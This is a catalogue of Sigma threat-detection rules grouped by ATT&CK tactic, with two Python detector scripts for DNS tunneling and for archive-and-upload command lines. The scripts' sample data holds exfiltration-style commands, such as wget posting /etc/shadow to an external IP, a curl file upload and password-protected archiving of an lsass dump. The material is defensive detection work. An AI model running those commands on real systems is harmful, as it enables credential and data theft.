Compressed File Extraction Via Tar.EXElowDetects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.
APT40 Dropbox Tool User AgenthighDetects suspicious user agent string of APT40 Dropbox tool
Potential CVE-2023-23397 Exploitation Attempt - SMBmediumDetects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397.
Mail Forwarding/Redirecting Activity In O365mediumDetects email forwarding or redirecting activity in O365 audit logs.
Compress-Archive Cmdlet ExecutionlowDetects PowerShell scripts that make use of the "Compress-Archive" cmdlet in order to compress folders and files. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Potential Data Exfiltration Over SMTP Via Send-MailMessage CmdletmediumDetects the execution of a PowerShell script with a call to the "Send-MailMessage" cmdlet along with the "-Attachments" flag. This could be a potential sign of data exfiltration via Email. Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Potential Data Exfiltration Via Curl.EXEmediumDetects the execution of the "curl" process with upload flags, which might indicate potential data exfiltration.
Tunneling Tool ExecutionmediumDetects the execution of well known tools that can be abused for data exfiltration and tunneling.
AWS EC2 Download UserdatamediumDetects bulk downloading of User Data associated with AWS EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.
Possible DNS TunnelinghighNormally, DNS logs contain a limited number of distinct queries for a single domain. This rule detects a high number of queries for a single domain, which can be an indicator that DNS is being used to transfer data.
High DNS Bytes OutmediumHigh volume of DNS query bytes from a host within a short period of time.
High NULL Records Requests RatemediumExtremely high rate of NULL record type DNS requests from a host within a short period of time. Possible result of iodine tool execution.
High DNS Requests RatemediumHigh number of DNS requests from a host within a short period of time.
High DNS subdomain requests rate per domainhighHigh rate of unique fully qualified domain name (FQDN) requests per root domain (eTLD+1) within a short period of time.
High TXT Records Requests RatemediumExtremely high rate of TXT record type DNS requests from a host within a short period of time. Possible result of Do-exfiltration tool execution.
Large domain name requesthighDetects unusually large DNS domain names.
High DNS Bytes Out - FirewallmediumHigh volume of DNS query bytes from a host within a short period of time.
High DNS Requests Rate - FirewallmediumHigh number of DNS requests from a host within a short period of time.
Tap Driver InstallationmediumWell-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques
Potential Exfiltration of Compressed FilesmediumThis rule detects potential exfiltration by looking for a few compression extensions in the URI and for signs of compression in the MIME type, file type and HTTP body.
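The DNS tunneling rules above (high unique-subdomain rate per eTLD+1, high request and byte rates, TXT/NULL record rates, large names) all reduce to a few windowed counters per client. The Python below is an added example written for this report, not one of the Sigma rules it summarises: it runs those heuristics over a constructed DNS query log. The log format, the client addresses, the tunnel-test.net domain and the thresholds are assumptions, and eTLD+1 is approximated by the last two labels rather than the Public Suffix List.

```python
"""Windowed DNS tunneling heuristics over a constructed query log (added example)."""
from collections import defaultdict

# Illustrative thresholds, deliberately low so the small sample trips them.
# Production values come from baselining your own resolver traffic (assumption).
UNIQUE_FQDN_THRESHOLD = 4      # distinct FQDNs per root domain, per client and window
QUERY_RATE_THRESHOLD = 6       # queries per client and window
BYTES_OUT_THRESHOLD = 400      # total qname bytes per client and window
LARGE_NAME_LENGTH = 100        # any single qname longer than this is "large"
RARE_RRTYPE_THRESHOLD = 3      # TXT/NULL lookups per client and window

# Constructed sample: "epoch client qtype qname". 10.0.0.5 browses normally;
# 10.0.0.9 pushes hex-encoded chunks of a PE file through labels of tunnel-test.net.
SAMPLE_DNS_LOG = """\
1700000000 10.0.0.5 A www.example.com
1700000001 10.0.0.5 A mail.example.com
1700000002 10.0.0.5 AAAA cdn.example.com
1700000003 10.0.0.9 A t.tunnel-test.net
1700000003 10.0.0.9 TXT 4d5a90000300000004000000ffff0000.b8000000000000004000000000000000.t.tunnel-test.net
1700000004 10.0.0.9 TXT 0e1fba0e00b409cd21b8014ccd215468.69732070726f6772616d2063616e6e6f.t.tunnel-test.net
1700000004 10.0.0.9 NULL 742062652072756e20696e20444f5320.6d6f64652e0d0d0a2400000000000000.t.tunnel-test.net
1700000005 10.0.0.9 TXT 50450000648602000000000000000000.f00022200b020e1a00da050000160100.t.tunnel-test.net
1700000006 10.0.0.9 TXT 00000000a05d0000001000000000a041.0100000000100000000200000a000000.c0ffee00000000000000000000000000.t.tunnel-test.net
"""


def parse_dns_log(text):
    """Parse the constructed 'epoch client qtype qname' lines into dicts."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qtype, qname = line.split()
        records.append({"ts": int(ts), "client": client,
                        "qtype": qtype.upper(), "qname": qname.rstrip(".").lower()})
    return records


def root_domain(qname):
    """Approximate eTLD+1 as the last two labels. Assumption: a real deployment
    should consult the Public Suffix List so that e.g. example.co.uk is not split."""
    labels = qname.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else qname


def analyse(records, window=60):
    """Return sorted (client, root_domain, reason) findings per client and time window."""
    findings = set()
    buckets = defaultdict(list)
    for r in records:
        buckets[(r["client"], r["ts"] // window)].append(r)

    for (client, _), recs in buckets.items():
        # High DNS subdomain requests rate per domain: distinct FQDNs under one eTLD+1
        per_root = defaultdict(set)
        for r in recs:
            per_root[root_domain(r["qname"])].add(r["qname"])
        for root, fqdns in per_root.items():
            if len(fqdns) >= UNIQUE_FQDN_THRESHOLD:
                findings.add((client, root, "high unique subdomain rate per domain"))
        # High DNS requests rate / High DNS bytes out: volume from one host
        if len(recs) >= QUERY_RATE_THRESHOLD:
            findings.add((client, "*", "high DNS request rate"))
        if sum(len(r["qname"]) for r in recs) >= BYTES_OUT_THRESHOLD:
            findings.add((client, "*", "high DNS bytes out"))
        # High TXT / NULL records requests rate: record types tunnels favour
        if sum(r["qtype"] in ("TXT", "NULL") for r in recs) >= RARE_RRTYPE_THRESHOLD:
            findings.add((client, "*", "high TXT/NULL record request rate"))
        # Large domain name request: a single oversized qname
        for r in recs:
            if len(r["qname"]) > LARGE_NAME_LENGTH:
                findings.add((client, root_domain(r["qname"]), "large domain name request"))
    return sorted(findings)


if __name__ == "__main__":
    for client, root, reason in analyse(parse_dns_log(SAMPLE_DNS_LOG)):
        print(f"{client:10} {root:18} {reason}")
```

Only the tunneling client is flagged, on all five heuristics; the browsing client stays under every threshold even though its queries share one root domain. In practice the unique-FQDN counter is the one that separates tunnels from busy CDNs, so start tuning there.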
attack.collection 88
Title Level Description
iOS Implant URL PatterncriticalDetects URL pattern used by iOS Implant
OpenCanary - GIT Clone RequesthighDetects instances where a Git service on an OpenCanary node has received a git clone request.
OpenCanary - MSSQL Login Attempt Via SQLAuthhighDetects instances where an MSSQL service on an OpenCanary node has had a login attempt using SQLAuth.
OpenCanary - MSSQL Login Attempt Via Windows AuthenticationhighDetects instances where an MSSQL service on an OpenCanary node has had a login attempt using Windows Authentication.
OpenCanary - MySQL Login AttempthighDetects instances where a MySQL service on an OpenCanary node has had a login attempt.
OpenCanary - REDIS Action Command AttempthighDetects instances where a REDIS service on an OpenCanary node has had an action command attempted.
OpenCanary - SIP RequesthighDetects instances where a SIP service on an OpenCanary node has received a SIP request.
OpenCanary - SMB File Open RequesthighDetects instances where an SMB service on an OpenCanary node has had a file open request.
AWS EC2 VM Export FailurelowAn attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.
Bitbucket Full Data Export TriggeredhighDetects when full data export is attempted.
Bitbucket Unauthorized Full Data Export TriggeredcriticalDetects when a full data export is attempted by an unauthorized user.
Bitbucket User Details Export Attempt DetectedmediumDetects user data export activity.
Google Full Network Traffic Packet CapturemediumIdentifies potential full network packet capture in GCP. This feature can be abused to read sensitive data from unencrypted internal traffic.
Github Delete Action InvokedmediumDetects delete action in the Github audit logs for codespaces, environment, project and repo.
Github Outside Collaborator DetectedmediumDetects when an organization member or outside collaborator is added to or removed from a project board or has their permission level changed; when an owner removes an outside collaborator from an organization; or when an organization requires two-factor authentication and an outside collaborator does not use 2FA or disables it.
Github Self Hosted Runner Changes DetectedlowA self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once detected, such changes should be validated from the GitHub UI because the log entry may not provide full context.
PST Export Alert Using eDiscovery AlertmediumAlerts when a user has performed an eDiscovery search or exported a PST file from the search. Such PST files usually contain sensitive information, including email body content.
PST Export Alert Using New-ComplianceSearchActionmediumAlerts when a user has exported a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection catches PST exports even if the 'eDiscovery search or exported' alert is disabled in O365. It applies to Exchange PowerShell usage as well as usage from the cloud.
Audio CapturelowDetects attempts to record audio with arecord utility
Linux Capabilities DiscoverylowDetects attempts to discover files with capabilities or the setuid/setgid bits set, which could allow an adversary to escalate privileges.
Clipboard Collection with Xclip Tool - AuditdlowDetects attempts to collect data stored in the clipboard using the xclip tool (xclip has to be installed). Using this rule on servers is recommended, since clipboard utilities are heavily used on user workstations.
Clipboard Collection of Image Data with Xclip ToollowDetects attempts to collect image data stored in the clipboard using the xclip tool (xclip has to be installed). Using this rule on servers is recommended, since clipboard utilities are heavily used on user workstations.
Screen Capture with Import ToollowDetects an adversary creating a screen capture of the desktop with the ImageMagick import tool (ImageMagick must be installed). Using this rule on servers is recommended, since screenshot utilities are heavily used on user workstations.
Screen Capture with XwdlowDetects an adversary creating a screen capture of the full screen with xwd. Using this rule on servers is recommended, since screenshot utilities are heavily used on user workstations.
Clipboard Collection with Xclip ToollowDetects attempts to collect data stored in the clipboard using the xclip tool (xclip has to be installed). Using this rule on servers is recommended, since clipboard utilities are heavily used on user workstations.
Clipboard Data Collection Via OSAScripthighDetects possible collection of data from the clipboard via execution of the osascript binary
Screen Capture - macOSlowDetects attempts to use screencapture to collect macOS screenshots
Cisco Collect DatalowDetects collection of pertinent data from the device configuration files.
Cisco Stage DatalowVarious protocols may be used to stage data on the device for exfiltration or infiltration.
Cisco BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing
Cisco LDP Authentication FailureslowDetects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
Huawei BGP Authentication FailureslowDetects BGP failures which may be indicative of brute force attacks to manipulate routing.
Juniper BGP Missing MD5lowDetects Juniper BGP sessions missing an MD5 digest, which may be indicative of brute-force attacks to manipulate routing.
Suspicious Access to Sensitive File Extensions - ZeekmediumDetects known sensitive file extensions via Zeek
Processes Accessing the Microphone and WebcammediumDetects processes potentially accessing the microphone and webcam on an endpoint.
Suspicious Access to Sensitive File ExtensionsmediumDetects known sensitive file extensions accessed on a network share
DNS Query Request To OneLaunch Update ServicelowDetects DNS query requests to "update.onelaunch.com". This domain is associated with the OneLaunch adware application. When the OneLaunch application is installed it will attempt to get updates from this domain.
WinDivert Driver LoadhighDetects the load of the WinDivert driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows.
CredUI.DLL Loaded By Uncommon ProcessmediumDetects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
ADFS Database Named Pipe Connection By Uncommon ToolmediumDetects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.
Zip A Folder With PowerShell For Staging In Temp - PowerShellmediumDetects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
PowerShell Get ClipboardmediumA general detection for the Get-Clipboard cmdlet in PowerShell logs. This could be an adversary capturing clipboard contents.
Zip A Folder With PowerShell For Staging In Temp - PowerShell ModulemediumDetects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Automated Collection Command PowerShellmediumOnce established within a system or network, an adversary may use automated techniques for collecting internal data.
Windows Screen Capture with CopyFromScreenmediumAdversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations
Powershell KeyloggingmediumAdversaries may log user keystrokes to intercept credentials as the user types them.
Potential Keylogger ActivitymediumDetects PowerShell scripts that contain references to keystroke capturing functions.
Powershell Local Email CollectionmediumAdversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user's local system, such as Outlook storage or cache files.
Recon Information for Export with PowerShellmediumOnce established within a system or network, an adversary may use automated techniques for collecting internal data
Zip A Folder With PowerShell For Staging In Temp - PowerShell ScriptmediumDetects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Compress Data and Lock With Password for Exfiltration With 7-ZIPmediumAn adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
7Zip Compressing Dump FilesmediumDetects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
Data Copied To Clipboard Via Clip.EXElowDetects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Esentutl Steals Browser InformationmediumOne way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe
Suspicious Manipulation Of Default Accounts Via Net.EXEhighDetects suspicious manipulation of default accounts such as 'administrator' and 'guest', for example enabling or disabling the accounts or changing their passwords.
Audio Capture via PowerShellmediumDetects audio capture via PowerShell Cmdlet.
PowerShell Get-Clipboard Cmdlet Via CLImediumDetects usage of the 'Get-Clipboard' cmdlet via CLI
Exchange PowerShell Snap-Ins UsagehighDetects adding and using Exchange PowerShell snap-ins to export mailbox data, as seen used by HAFNIUM and APT27.
Folder Compress To Potentially Suspicious Output Via Compress-Archive CmdletmediumDetects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Screen Capture Activity Via Psr.EXEmediumDetects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
PUA - Mouse Lock ExecutionmediumIn Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
Rar Usage with Password and Compression LevelhighDetects the use of rar.exe on the command line to create an archive with password protection or with a specific compression level, which is fairly indicative of malicious actions.
Files Added To An Archive Using Rar.EXElowDetects usage of "rar" to add files to an archive for potential compression. An adversary may compress data (e.g. sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
Windows Recall Feature Enabled Via Reg.EXEmediumDetects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" value, or setting it to 0. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
Renamed Remote Utilities RAT (RURAT) ExecutionmediumDetects execution of renamed Remote Utilities (RURAT) via Product PE header field
Audio Capture via SoundRecordermediumDetects an attacker collecting audio via the SoundRecorder application.
Veeam Backup Database Suspicious QuerymediumDetects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.
VeeamBackup Database Credentials Dump Via Sqlcmd.EXEhighDetects dumping of credentials from the VeeamBackup database (dbo schema) via sqlcmd.
SQLite Chromium Profile Data DB AccesshighDetects usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.
SQLite Firefox Profile Data DB AccesshighDetects usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.
Automated Collection Command PromptmediumOnce established within a system or network, an adversary may use automated techniques for collecting internal data.
Copy From Or To Admin Share Or Sysvol FoldermediumDetects a copy command or a copy utility execution to or from an Admin share or remote
Recon Information for Export with Command PromptmediumOnce established within a system or network, an adversary may use automated techniques for collecting internal data.
Compressed File Creation Via Tar.EXElowDetects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
Compressed File Extraction Via Tar.EXElowDetects execution of "tar.exe" in order to extract compressed file. Adversaries may abuse various utilities in order to decompress data to avoid detection.
Winrar Compressing Dump FilesmediumDetects execution of WinRAR in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.
Winrar Execution in Non-Standard FoldermediumDetects a suspicious winrar execution in a folder which is not the default installation folder
Compress Data and Lock With Password for Exfiltration With WINZIPmediumAn adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities
Windows Recall Feature Enabled - DisableAIDataAnalysis Value DeletedmediumDetects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by deleting the existing "DisableAIDataAnalysis" registry value. Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
Suspicious Camera and Microphone AccesshighDetects Processes accessing the camera and microphone from suspicious folder
Periodic Backup For System Registry Hives EnabledmediumDetects the enabling of the "EnablePeriodicBackup" registry value. Once enabled, the OS will back up system registry hives on restart to the "C:\Windows\System32\config\RegBack" folder and create a "RegIdleBackup" task to manage subsequent backups. Registry backup was default behavior on Windows until it was disabled as of Windows 10, version 1803.
Windows Recall Feature Enabled - RegistrymediumDetects the enabling of the Windows Recall feature via registry manipulation. Windows Recall can be enabled by setting the value of "DisableAIDataAnalysis" to "0". Adversaries may enable Windows Recall as part of post-exploitation discovery and collection activities. This rule assumes that Recall is already explicitly disabled on the host, and subsequently enabled by the adversary.
Conti NTDS Exfiltration CommandhighDetects a command used by conti to exfiltrate NTDS
Potential Conti Ransomware Database Dumping Activity Via SQLCmdhighDetects a command used by conti to dump database
Clipboard Data Collection Via PbpastemediumDetects execution of the "pbpaste" utility, which retrieves the contents of the clipboard (a.k.a. pasteboard) and writes them to the standard output (stdout). The utility is often used for creating new files with the clipboard content or for piping clipboard contents to other commands. It can also be used in shell scripts that may require clipboard content as input. Attackers can abuse this utility in order to collect data from the user clipboard, which may contain passwords or sensitive information. Use this rule to hunt for potential abuse of the utility by looking at the parent process and any potentially suspicious command line content.
System Drawing DLL LoadlowDetects processes loading "System.Drawing.ni.dll". This could be an indicator of potential Screen Capture.
Password Protected Compressed File Extraction Via 7ZiplowDetects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.
Potentially Suspicious Compression Tool ParametersmediumDetects potentially suspicious command line arguments of common data compression tools
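The archive-and-upload rules in the exfiltration table earlier (wget --post-file, curl upload flags, Compress-Archive) and in this collection table (rar with password and compression level, 7-Zip with -p, archiving of .dmp files) all key on tokens of a process-creation command line. The Python below is an added example, not the Sigma rules' own conditions: it approximates those checks over constructed Sysmon-style events. The event fields, file paths, the hosts 203.0.113.7 and files.example.invalid, and the staging-directory list are assumptions, and the predicates are simplifications of the real rules.

```python
"""Approximate command-line checks for archiving/upload tooling (added example)."""
import re
from pathlib import PureWindowsPath

RAR_IMAGES = {"rar.exe", "winrar.exe"}
SEVENZIP_IMAGES = {"7z.exe", "7za.exe", "7zr.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
# Assumed list of staging locations commonly used before exfiltration.
STAGING_DIRS = ("c:\\windows\\temp\\", "c:\\programdata\\", "c:\\users\\public\\", "c:\\temp\\")

# Constructed Sysmon EID 1 style events, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\WinRAR\Rar.exe",
     "CommandLine": r"Rar.exe a -hpP@ssw0rd -m5 C:\Users\Public\docs.rar C:\Users\alice\Documents\*"},
    {"Image": r"C:\Tools\7z.exe",
     "CommandLine": r"7z.exe a -pSecret C:\ProgramData\lsass.7z C:\Windows\Temp\lsass.dmp"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -T C:\Users\Public\docs.rar https://files.example.invalid/up"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe Compress-Archive -Path C:\Users\alice\Documents -DestinationPath C:\Windows\Temp\a.zip"},
    {"Image": r"C:\Program Files\WinRAR\Rar.exe",            # plain backup, no password
     "CommandLine": r"Rar.exe a C:\Users\alice\backup.rar C:\Users\alice\Pictures\*"},
    {"Image": r"C:\Windows\System32\curl.exe",               # download, not upload
     "CommandLine": r"curl.exe -L -o C:\Temp\tool.zip https://example.invalid/tool.zip"},
    {"Image": "/usr/bin/wget",                               # Linux sudo-wget abuse
     "CommandLine": "wget --post-file=/etc/shadow http://203.0.113.7/up"},
]


def _image(event):
    # PureWindowsPath also splits POSIX-style paths, so this works for the Linux event.
    return PureWindowsPath(event["Image"]).name.lower()


def _tokens(event):
    return event["CommandLine"].split()


def _rar_password_and_level(event):
    toks = _tokens(event)
    return (_image(event) in RAR_IMAGES
            and any(t.startswith(("-hp", "-p")) for t in toks)   # -p/-hp<password>
            and any(re.fullmatch(r"-m[0-5]", t) for t in toks))  # explicit compression level


def _rar_add(event):
    return _image(event) in RAR_IMAGES and "a" in _tokens(event)


def _sevenzip_password(event):
    toks = _tokens(event)
    return (_image(event) in SEVENZIP_IMAGES and bool({"a", "u"} & set(toks))
            and any(t.startswith("-p") for t in toks))


def _archives_dump(images):
    def pred(event):
        return _image(event) in images and any(
            t.lower().endswith((".dmp", ".dump")) for t in _tokens(event))
    return pred


def _curl_upload(event):
    if _image(event) != "curl.exe":
        return False
    toks = _tokens(event)
    if {"-T", "--upload-file", "-F", "--form"} & set(toks):
        return True
    # -d @file / --data-binary @file send a local file as the request body
    return any(toks[i] in ("-d", "--data", "--data-binary") and toks[i + 1].startswith("@")
               for i in range(len(toks) - 1))


def _wget_post_file(event):
    return _image(event) in {"wget", "wget.exe"} and any(
        t.startswith("--post-file") for t in _tokens(event))


def _compress_archive(event):
    return _image(event) in POWERSHELL_IMAGES and "compress-archive" in event["CommandLine"].lower()


def _compress_archive_to_staging(event):
    if not _compress_archive(event):
        return False
    toks = [t.lower() for t in _tokens(event)]
    for i, t in enumerate(toks[:-1]):
        if t == "-destinationpath":
            dest = toks[i + 1].strip("\"'")
            return dest.startswith(STAGING_DIRS) or "\\appdata\\local\\temp\\" in dest
    return False


# (title from the report, level, predicate); titles are the rules' names, logic is approximate.
RULES = [
    ("Rar Usage with Password and Compression Level", "high", _rar_password_and_level),
    ("Files Added To An Archive Using Rar.EXE", "low", _rar_add),
    ("Compress Data and Lock With Password for Exfiltration With 7-ZIP", "medium", _sevenzip_password),
    ("7Zip Compressing Dump Files", "medium", _archives_dump(SEVENZIP_IMAGES)),
    ("Winrar Compressing Dump Files", "medium", _archives_dump(RAR_IMAGES)),
    ("Potential Data Exfiltration Via Curl.EXE", "medium", _curl_upload),
    ("Data Exfiltration with Wget", "medium", _wget_post_file),
    ("Compress-Archive Cmdlet Execution", "low", _compress_archive),
    ("Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet", "medium", _compress_archive_to_staging),
]


def evaluate(event):
    """Return the (title, level) pairs whose predicate matches a single event."""
    return [(title, level) for title, level, pred in RULES if pred(event)]


def scan(events):
    """Map each event index to its matches."""
    return {i: evaluate(e) for i, e in enumerate(events)}


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, hits or "-")
```

The benign rar backup only trips the low-level "files added" rule while the password-protected one also trips the high-level rule, which is the layering the report's levels are meant to give an analyst; the curl download and the 7-Zip/rar split of the dump-file check show why the image name has to be part of every predicate.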
attack.resource_development 34
Title Level Description
Antivirus Relevant File Paths AlertshighDetects an antivirus alert in a highly relevant file path or with a relevant file name. This event must not be ignored just because the AV blocked the malware; investigate how it got there in the first place.
Bitbucket Unauthorized Access To A ResourcecriticalDetects unauthorized access attempts to a resource.
Bitbucket Unauthorized Full Data Export TriggeredcriticalDetects when a full data export is attempted by an unauthorized user.
  • Okta Suspicious Activity Reported by End-user - Level: high
    Description: Detects when an Okta end-user reports activity by their account as being potentially suspicious.
  • Program Executions in Suspicious Folders - Level: medium
    Description: Detects program executions in suspicious non-program folders related to malware or hacking activity
  • Relevant ClamAV Message - Level: high
    Description: Detects relevant ClamAV messages
  • Linux HackTool Execution - Level: high
    Description: Detects known hacktool execution based on image name.
  • Relevant Anti-Virus Signature Keywords In Application Log - Level: high
    Description: Detects potentially highly relevant antivirus events in the application log based on known virus signature names and malware keywords.
  • ProxyLogon MSExchange OabVirtualDirectory - Level: critical
    Description: Detects specific patterns found after a successful ProxyLogon exploitation in relation to a Commandlet invocation of Set-OabVirtualDirectory
  • Windows Update Error - Level: informational
    Description: Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.
  • Uncommon File Created In Office Startup Folder - Level: high
    Description: Detects the creation of a file with an uncommon extension in an Office application startup folder
  • Creation of a Diagcab - Level: medium
    Description: Detects the creation of a diagcab file, which could be caused by a legitimate installer or be a sign of exploitation (review the filename and its location)
  • VHD Image Download Via Browser - Level: medium
    Description: Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.
  • HackTool - PurpleSharp Execution - Level: critical
    Description: Detects the execution of the PurpleSharp adversary simulation tool
  • PUA - CsExec Execution - Level: high
    Description: Detects the use of the lesser-known remote execution tool CsExec, a PsExec alternative
  • Renamed SysInternals DebugView Execution - Level: high
    Description: Detects suspicious renamed SysInternals DebugView execution
  • Potential Execution of Sysinternals Tools - Level: low
    Description: Detects command lines that contain the 'accepteula' flag, which could be a sign of execution of one of the Sysinternals tools
  • PsExec/PAExec Escalation to LOCAL SYSTEM - Level: high
    Description: Detects suspicious command line flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights
  • Potential PsExec Remote Execution - Level: high
    Description: Detects potential PsExec commands that initiate execution on a remote system via common command line flags used by the utility
  • Potential Privilege Escalation To LOCAL SYSTEM - Level: high
    Description: Detects an unknown program using command line flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM privileges
  • PUA - Sysinternal Tool Execution - Registry - Level: low
    Description: Detects the execution of a Sysinternals tool via the creation of the "accepteula" registry key
  • Suspicious Execution Of Renamed Sysinternals Tools - Registry - Level: high
    Description: Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)
  • PUA - Sysinternals Tools Execution - Registry - Level: medium
    Description: Detects the execution of some potentially unwanted tools such as PsExec, Procdump, etc. (part of the Sysinternals suite) via the creation of the "accepteula" registry key.
  • HybridConnectionManager Service Installation - Registry - Level: high
    Description: Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from an Azure function.
  • Usage of Renamed Sysinternals Tools - RegistrySet - Level: high
    Description: Detects non-Sysinternals tools setting the "accepteula" key, which is normally set on Sysinternals tool execution
  • Suspicious Keyboard Layout Load - Level: medium
    Description: Detects the keyboard preload installation with a suspicious keyboard layout, e.g. a Chinese, Iranian or Vietnamese layout loaded in a user session on systems maintained by US staff only
  • Formbook Process Creation - Level: high
    Description: Detects Formbook-like process executions that inject code into a set of files in the System32 folder, which execute a special command line to delete the dropper from the AppData Temp folder. False positives are avoided by excluding all parent processes with command line parameters.
  • Mustang Panda Dropper - Level: high
    Description: Detects specific process parameters as used by Mustang Panda droppers
  • CVE-2021-1675 Print Spooler Exploitation Filename Pattern - Level: critical
    Description: Detects the default filename used in PoC code against the print spooler vulnerability CVE-2021-1675
  • Suspicious Word Cab File Write CVE-2021-40444 - Level: high
    Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444
  • Conti Volume Shadow Listing - Level: high
    Description: Detects a command used by Conti to find volume shadow backups
  • FoggyWeb Backdoor DLL Loading - Level: critical
    Description: Detects the DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor, which loads a malicious version of the expected "version.dll" DLL
  • Creation of an Executable by an Executable - Level: low
    Description: Detects the creation of an executable by another executable.
  • Potential AWS Cloud Email Service Abuse - Level: medium
    Description: Detects when the email sending feature is enabled for an AWS account and the email address verification request is dispatched in quick succession
attack.reconnaissance 20
  • Azure AD Account Credential Leaked - Level: high
    Description: Indicates that the user's valid credentials have been leaked.
  • Bitbucket User Details Export Attempt Detected - Level: medium
    Description: Detects user data export activity.
  • Bitbucket User Permissions Export Attempt - Level: medium
    Description: Detects user permission data export attempt.
  • Suspicious Use of /dev/tcp - Level: medium
    Description: Detects suspicious command with /dev/tcp
  • SSHD Error Message CVE-2018-15473 - Level: medium
    Description: Detects exploitation attempt using public exploit code for CVE-2018-15473
  • Cat Sudoers - Level: medium
    Description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights
  • Suspicious Git Clone - Linux - Level: medium
    Description: Detects execution of "git" in order to clone a remote repository that contains suspicious keywords
  • Print History File Contents - Level: medium
    Description: Detects events in which someone prints the contents of history files to the command line or redirects them to a file for reconnaissance
  • Linux Recon Indicators - Level: high
    Description: Detects events with patterns found in commands used for reconnaissance on Linux systems
  • DNS Query to External Service Interaction Domains - Level: high
    Description: Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE
  • Failed DNS Zone Transfer - Level: medium
    Description: Detects when a DNS zone transfer failed.
  • Suspicious DNS Query for IP Lookup Service APIs - Level: medium
    Description: Detects DNS queries for IP lookup services such as "api.ipify.org" originating from a non-browser process.
  • Potential Active Directory Enumeration Using AD Module - PsModule - Level: medium
